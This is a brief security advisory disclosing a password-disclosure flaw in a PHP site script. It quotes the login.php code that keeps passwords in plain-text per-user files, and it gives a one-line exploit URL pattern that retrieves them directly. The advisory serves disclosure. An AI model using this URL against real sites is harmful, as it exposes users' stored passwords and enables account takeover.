Informations : °°°°°°°°°°°°°° Website : http://www.hp-planet.de Version : 1 Problem : Informations disclosure PHP Code/Location : °°°°°°°°°°°°°°°°°°° login.php : ----------------------------------------- function passwd2($user) { $password="nicht registriert"; if (file_exists("user/".$user.".txt")) { $fp = fopen("user/".$user.".txt","r"); $data = fgetcsv($fp,10000,"#"); fclose($fp); $password=$data[0]; } return($password); } ----------------------------------------- Exploit : °°°°°°°°° http://[target]/user/[NICKNAME].txt More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/5holes8.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n http://www.phpsecure.org _________________________________________________________________
